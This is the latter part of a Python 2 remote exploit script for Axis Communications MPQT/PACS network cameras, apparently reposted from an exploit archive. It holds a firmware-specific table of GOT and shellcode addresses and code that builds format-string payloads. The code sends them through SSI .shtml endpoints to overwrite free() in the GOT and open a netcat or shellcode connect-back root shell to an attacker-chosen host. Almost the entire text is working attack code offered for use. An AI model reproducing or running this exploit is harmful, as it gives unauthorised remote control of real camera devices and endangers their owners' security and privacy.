700, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
# ARMel with bin/libs executable stack flag set with 'execstack'
# MPQT
'ARM-5.55x': [ #
0x1c15c, # Adjust to GOT free() address
0x1e834, # .bss shellcode address
59, # 1st POP's
80, # 2nd POP's
'axis', # Aligns injected code
800, # How big buffer before shellcode
'ARMel' # Shellcode type (ARMel)
],
#
# Using direct parameter access format string, AKA 'New Style'
#
# MPQT
'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root)
0x1c1b4, # Adjust to GOT free() address
0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.2x': [ #
0x1c1b4, # Adjust to GOT free() address
0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.4x': [ #
0x1c1b4, # Adjust to GOT free() address
0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
61, # 1st POP's
115, # 2nd POP's
143, # 3rd POP's
118, # 4th POP's
'NCSH2' # Shellcode type (Netcat Shell)
],
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'ARM-NCSH-5.5x': [ #
0x1c15c, # Adjust to GOT free() address
0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.6x': [ #
0x1c15c, # Adjust to GOT free() address
0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
97, # 1st POP's
0, # 2nd POP's
41, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-5.7x': [ #
0x1c1c0, # Adjust to GOT free() address
0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
132, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
0, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# Will go in endless loop after exit of nc shell... DoS sux
# MPQT
'ARM-NCSH-5.8x': [ #
0x1b39c, # Adjust to GOT free() address
0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
98, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
# MPQT
'ARM-NCSH-6.1x': [ #
0x1d2a4, # Adjust to GOT free() address
# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
106, # 1st POP's
0, # 2nd POP's
34, # 3rd POP's
1, # 4th POP's
'NCSH1' # Shellcode type (Netcat Shell)
],
#
# Using POP format string, AKA 'Old Style'
#
# MPQT
'CRISv32-5.5x': [ #
0x8d148, # Adjust to GOT free() address
0x8f5a8, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.4x': [ #
0x8d0e0, # Adjust to GOT free() address
0x8f542, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.2x': [ #
0x8d0b4, # Adjust to GOT free() address
0x8f4d6, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
],
# MPQT
'CRISv32-5.20.0': [ #
0x8d0e4, # Adjust to GOT free() address
0x8f546, # .bss shellcode address
4, # 1st POP's
13, # 2nd POP's
'axis', # Aligns injected code
470, # How big buffer before shellcode
'CRISv32' # Shellcode type (Crisv32)
]
}
if self.target == 0:
return target_db
if not self.target in target_db:
print "[!] Unknown FMS key: %s!" % self.target
sys.exit(1)
if self.verbose:
print "[Verbose] Number of availible FMS keys:",len(target_db)
return target_db
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
# Or we check again if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
noexploit = False
lhost = '192.168.0.1' # Default Local HOST
lport = '31337' # Default Local PORT
rhost = '192.168.0.90' # Default Remote HOST
rport = '80' # Default Remote PORT
# Not needed for the SSI exploit, here for possible future usage.
# creds = 'root:pass'
creds = False
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
# prog=sys.argv[0],
prog='axis-ssid-PoC.py',
description=('[*]' + INFO + '\n'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
arg_parser.add_argument('--fms', required=False, help='Manual FMS key')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)
# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
# Print out info from dictionary
if args.dict:
target = FMSdb(rhost,verbose).FMSkey(0)
print "[db] Number of FMS keys:",len(target)
# Print out detailed info from dictionary
if verbose:
print "[db] Target details of FMS Keys availible for manual xploiting"
print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]"
for tmp in range(0,len(target)):
Key = sorted(target.keys())[tmp]
temp = re.split('[-]',Key)[0:10]
if temp[1] == 'NCSH':
print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6]
print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]"
for tmp in range(0,len(target)):
Key = sorted(target.keys())[tmp]
temp = re.split('[-]',Key)[0:10]
if temp[1] != 'NCSH':
print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6]
print "\n"
else:
print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:"
Key = ""
for tmp in range(0,len(target)):
Key += sorted(target.keys())[tmp]
Key += ', '
print '\n',Key,'\n'
sys.exit(0)
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.noexploit:
noexploit = args.noexploit
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
if args.lport:
lport = args.lport
if args.lhost:
lhost = args.lhost
# Check if LPORT is valid
if not Validate(verbose).Port(lport):
print "[!] Invalid LPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if LHOST is valid IP or FQDN, get IP back
lhost = Validate(verbose).Host(lhost)
if not lhost:
print "[!] Invalid LHOST"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if noexploit:
print "[i] Test mode selected, no exploiting..."
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
print "[i] Connect back IP:",lhost
print "[i] Connect back PORT:",lport
rhost = rhost + ':' + rport
#
# FMS key is required into this PoC
#
if not args.fms:
print "[!] FMS key is required!"
sys.exit(1)
else:
Key = args.fms
print "[i] Trying with FMS key:",Key
#
# Prepare exploiting
#
# Look up the FMS key in dictionary and return pointer for FMS details to use
target = FMSdb(rhost,verbose).FMSkey(Key)
if target[Key][6] == 'NCSH1':
NCSH1 = target[Key][6]
NCSH2 = ""
elif target[Key][6] == 'NCSH2':
NCSH2 = target[Key][6]
NCSH1 = ""
else:
NCSH1 = ""
NCSH2 = ""
if Key == 'ARM-NCSH-5.8x':
print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n"
sys.exit(0)
print "[i] Preparing shellcode:",str(target[Key][6])
# We don't use url encoded shellcode with Netcat shell
# This is for MIPS/CRISv32 and ARM shellcode
if not NCSH1 and not NCSH2:
FMSdata = target[Key][4] # This entry aligns the injected shellcode
# Building up the url encoded shellcode for sending to the target,
# and replacing LHOST / LPORT in shellcode to choosen values
# part of first 500 decoded bytes will be overwritten during stage #2, and since
# there is different 'tailing' on the request internally, keep it little more than needed, to be safe.
# Let it be 0x00, just for fun.
FMSdata += '%00' * target[Key][5]
# Connect back IP to url encoded
ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))
ip_hex = ip_hex.split()
IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];
# Let's break apart the hex code of LPORT into two bytes
port_hex = hex(int(lport))[2:]
port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
port_hex = port_hex.split()
if (target[Key][6]) == 'MIPSel':
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%ff"
PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%00"
PP0 = '%{:02x}'.format(int(port_hex[0],16))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format(int(port_hex[0],16))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
elif (target[Key][6]) == 'CRISv32':
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%00"
PP0 = '%{:02x}'.format(int(port_hex[0],16))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format(int(port_hex[0],16))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
else:
print "[!] Unknown shellcode! (%s)" % str(target[Key][6])
sys.exit(1)
# Replace LHOST / LPORT in URL encoded shellcode
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("IP1",IP1)
shell = shell.replace("IP2",IP2)
shell = shell.replace("IP3",IP3)
shell = shell.replace("IP4",IP4)
shell = shell.replace("PP0",PP0)
shell = shell.replace("PP1",PP1)
FMSdata += shell
#
# Calculate the FMS values to be used
#
# Get pre-defined values
ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS
# POP_SIZE = 8
POP_SIZE = 1
GOThex = target[Key][0]
BSShex = target[Key][1]
GOTint = int(GOThex)
# 'One-Write-Where-And-What'
if not NCSH1 and not NCSH2:
POP1 = target[Key][2]
POP2 = target[Key][3]
# Calculate for creating the FMS code
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)
BSSint = int(BSShex)
BSSint = (BSSint - GOTint - ALREADY_WRITTEN)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint
# 'Two-Write-Where-And-What' using "New Style"
elif NCSH2:
POP1 = target[Key][2]
POP2 = target[Key][3]
POP3 = target[Key][4]
POP4 = target[Key][5]
POP2_SIZE = 2
# We need to count higher than provided address for the jump
BaseAddr = 0x10000 + BSShex
# Calculate for creating the FMS code
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint
# Calculate FirstWhat value
FirstWhat = BaseAddr - (ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat
# Calculate SecondWhat value, so it always is 0x20300
SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("LHOST",lhost)
shell = shell.replace("LPORT",lport)
FirstWhat = FirstWhat - len(shell)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
# 'Two-Write-Where-And-What' using "Old Style"
elif NCSH1:
POP1 = target[Key][2]
POP2 = target[Key][3]
POP3 = target[Key][4]
POP4 = target[Key][5]
POP2_SIZE = 2
# FirstWhat writes with 4 bytes (Y) (0x0002YYYY)
# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)
if BSShex > 0x10000:
MSB = 1
else:
MSB = 0
# We need to count higher than provided address for the jump
BaseAddr = 0x10000 + BSShex
# Calculate for creating the FMS code
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)
# Calculate FirstWhat value
FirstWhat = BaseAddr - (ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)
# Calculate SecondWhat value, so it always is 0x203[00] or [01]
SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("LHOST",lhost)
shell = shell.replace("LPORT",lport)
GOTint = GOTint - len(shell)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
else:
print "[!] NCSH missing, exiting"
sys.exit(1)
#
# Let's start the exploiting procedure
#
#
# Stage one
#
if NCSH1 or NCSH2:
# "New Style" needs to make the exploit in two stages
if NCSH2:
FMScode = do_FMS(rhost,verbose)
# Writing 'FirstWhere' and 'SecondWhere'
# 1st request
FMScode.AddADDR(GOTint) # Run up to free() GOT address
#
# 1st and 2nd "Write-Where"
FMScode.AddDirectParameterN(POP1) # Write 1st Where
FMScode.Add("XX") # Jump up two bytes for next address
FMScode.AddDirectParameterN(POP2) # Write 2nd Where
FMSdata = FMScode.FMSbuild()
else:
FMSdata = ""
print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
else:
print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM
# Actually, any valid and public readable .shtml file will work...
# (One of the two below seems always to be usable)
#
# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two
# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url
#
try:
target_url = "/httpDisabled.shtml?user_agent="
if noexploit:
target_url2 = target_url
else:
target_url2 = "/httpDisabled.shtml?&http_user="
if NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
except urllib2.HTTPError as e:
if e.code == 404:
print "[<] Error",e.code,e.reason
target_url = "/view/viewer_index.shtml?user_agent="
if noexploit:
target_url2 = target_url
else:
target_url2 = "/view/viewer_index.shtml?&http_user="
print "[>] Using alternative target shtml"
if NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
except Exception as e:
if not NCSH2:
print "[!] Shellcode delivery failed:",str(e)
sys.exit(1)
#
# Stage two
#
#
# Building and sending the FMS code to the target
#
print "[i] Building the FMS code..."
FMScode = do_FMS(rhost,verbose)
# This is an 'One-Write-Where-And-What' for FMS
#
# Stack Example:
#
# Stack content | Stack address (ASLR)
#
# 0x0 | @0x7e818dbc -> [POP1's]
# 0x0 | @0x7e818dc0 -> [free () GOT address]
# 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n)
# 0x76f41fb8 | @0x7e818dc8 | -> [POP2's]
# 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address]
# 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n)
# 0x1 | @0x7e818dd4
#
if not NCSH1 and not NCSH2:
FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's
FMScode.AddADDR(GOTint) # GOT Address
FMScode.AddWRITEn(1) # 4 bytes Write-Where
# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's
FMScode.AddADDR(BSSint) # BSS shellcode address
FMScode.AddWRITEn(1) # 4 bytes Write-What
# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
# End of 'One-Write-Where-And-What'
# This is an 'Two-Write-Where-And-What' for FMS
#
# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd="xxx" -->
# We jump over all SSI tagging to end up directly where "xxx" will
# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())
#
# The Trick here is to write lower target address, that we will jump to when calling free(),
# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT
# address with two LSB writes.
#
elif NCSH2:
#
# Direct parameter access for FMS exploitation are really nice and easy to use.
# However, we need to exploit in two stages with two requests.
# (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...)
#
# 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)
# 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to.
#
# With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1",
# we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write.
# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]
#
# Stack Example:
#
# Stack content | Stack address (ASLR)
#
# 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One]
# 0x76f41fb8 | @0x7e818dc8 |
# 0x76f3d70c | @0x7e818dcc |
# 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two]
# 0x1 | @0x7e818dd4
# [....]
# 0x1c154 | @0x7e818e10
# 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One]
# 0x76f41fb8 | @0x7e818e18 |
# 0x76f3d70c | @0x7e818e1c |
# 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two]
# 0x1 | @0x7e818e24
#
FMScode.Add(shell)
#
# 1st and 2nd "Write-Where" already done in stage one
#
# 1st and 2nd "Write-What"
#
FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB)
FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
elif NCSH1:
# Could use direct argument addressing here, but I like to keep "old style" as well,
# as it's another interesting concept.
#
# Two matching stack contents -> stack address in row w/o or max two POP's between,
# is needed to write two bytes higher (MSB).
#
#
# Stack Example:
#
# Stack Content | @Stack Address (ASLR)
#
# 0x9c | @7ef2fde8 -> [POP1's]
# [....]
# 0x1 | @7ef2fdec -> [GOTint address]
#------
# 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]
# -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)
# 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]
# ------ | |
# [....] -> [POP3's] | |
# 0x7fb99dc | @7ef2fe7c | |
# 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX]
# 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))
# -> [POP4's] |
# (nil) | @7ef2fe88 | [Count up to 0x20300]
# 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)
FMScode.Add(shell)
# Write FirstWhere for 'FirstWhat'
FMScode.AddPOP(POP1)
FMScode.AddADDR(GOTint) # Run up to free() GOT address
FMScode.AddWRITEn(1)
# Write SecondWhere for 'SecondWhat'
#
# This is special POP with 1 byte, we can maximum POP 2!
#
# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement
# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.
# Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x
#
if POP2 != 0:
# We only want to write 'SecondWhat' two bytes higher at free() GOT
if POP2 > 2:
print "POP2 can't be greater than two!"
sys.exit(1)
if POP2 == 1:
FMScode.Add("%2c")
else:
FMScode.Add("%1c%1c")
else:
FMScode.Add("XX")
FMScode.AddWRITEn(1)
# Write FirstWhat pointed by FirstWhere
FMScode.AddPOP(POP3) # Old Style POP's
FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)
# Write SecondWhat pointed by SecondWhere
FMScode.AddPOP(POP4) # Old Style POP's
FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
else:
sys.exit(1)
FMSdata = FMScode.FMSbuild()
print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))
# FMS comes here, and calculations start after '=' in the url
try:
if NCSH1 or NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
except urllib2.HTTPError as e:
print "[!] Payload delivery failed:",str(e)
sys.exit(1)
except Exception as e:
# 1st string returned by HTTP mode, 2nd by HTTPS mode
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[i] Timeout! Payload delivered sucessfully!"
else:
print "[!] Payload delivery failed:",str(e)
sys.exit(1)
if noexploit:
print "\n[*] Not exploiting, no shell...\n"
else:
print "\n[*] All done, enjoy the shell...\n"
#
# [EOF]
#
# 0day.today [2024-11-16] #